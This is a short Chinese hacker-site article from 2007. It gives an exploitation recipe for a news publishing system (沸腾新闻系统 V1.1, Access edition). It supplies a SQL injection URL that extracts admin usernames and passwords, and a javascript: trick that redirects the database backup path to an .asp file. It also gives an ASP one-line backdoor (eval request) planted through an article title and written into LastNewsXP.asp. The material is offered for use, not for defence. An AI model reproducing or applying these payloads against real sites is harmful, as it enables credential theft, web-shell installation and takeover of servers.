arow 您现在的位置: Yes!黑客联盟 >> 技术 >> 黑客技术 >> 漏洞利用 >> 正文
专题栏目
沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用           ★★★
沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用
作者:哽咽 文章来源:本站原创 更新时间:2007-5-15 7:39:47 【字体:

+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2

后台“图文管理”里添加文章,上传一个flash文件
点附加管理里的备份压缩
数据库地址为只读
打开恢复数据库窗口。IE输入
javascript:alert(window.frames['list'].document.forms[0].backpath.value="/data/x.asp");
就可自定义马的地址了

也可以在后台添加一个文章,标题为<%eval request(chr(120))%>
然后访问CreateASP.asp更新LastNewsXP.asp这个文件
后门就写到LastNewsXP.asp里面了


友情提示:如果您对本文章的内容存在疑问请到点此进入论坛进行讨论

文章录入:哽咽    责任编辑:哽咽 
  • 上一篇文章:

  • 下一篇文章:
  •